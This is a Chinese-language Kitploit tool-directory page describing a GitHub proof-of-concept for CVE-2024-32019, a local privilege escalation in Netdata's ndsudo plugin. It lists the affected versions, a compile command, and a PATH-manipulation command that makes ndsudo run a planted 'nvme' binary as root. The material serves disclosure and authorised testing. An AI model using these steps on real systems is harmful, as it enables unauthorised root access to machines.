Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-32019-POC — 概念验证漏洞利用程序,针对 CVE-2024-32019,演示了通过 Netdata 的 ndsudo 插件中不受信任的搜索路径实现本地权限提升。包含编译说明和部署步骤。 | Kitploit
工具/GitHubGitHub/alielkhatteb/cve-2024-32019-poc
权限提升漏洞利用渗透测试学习与教育二进制利用
GitHubalielkhatteb/cve-2024-32019-poc

CVE-2024-32019-POC

概念验证漏洞利用程序,针对 CVE-2024-32019,演示了通过 Netdata 的 ndsudo 插件中不受信任的搜索路径实现本地权限提升。包含编译说明和部署步骤。

查看仓库
5221年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

⚠️ CVE-2024-32019 - 概念验证

📌 受影响版本

  • >= v1.45.0, < v1.45.3
  • >= v1.44.0-60, < v1.45.0-169

🛠️ 概念验证

CVE-2024-32019 — ndsudo 本地权限提升通过不受信任的搜索路径。

🔧 编译漏洞利用代码

root@kitploit:~
x86_64-linux-gnu-gcc -o nvme exploit.c -static

📤 部署到目标机器

  1. 将编译好的二进制文件传输到易受攻击的机器上。

  2. 使其可执行:

    root@kitploit:~
    chmod +x nvme
    
  3. 通过 PATH 操纵利用易受攻击的二进制文件(使用你上传二进制文件的相同路径):

    root@kitploit:~
    PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
    

🔍 参考

  • Netdata 安全公告 - GHSA-pmhq-4cxq-wj93

⚖️ 免责声明与条款

此概念验证(PoC)代码仅供教育和授权渗透测试目的使用。

  • 不允许修改、重新分发或将此代码用于任何其他目的。
  • 未经授权的使用或修改可能是非法且不道德的。
  • 作者对任何滥用或损害不承担任何责任。
下载工具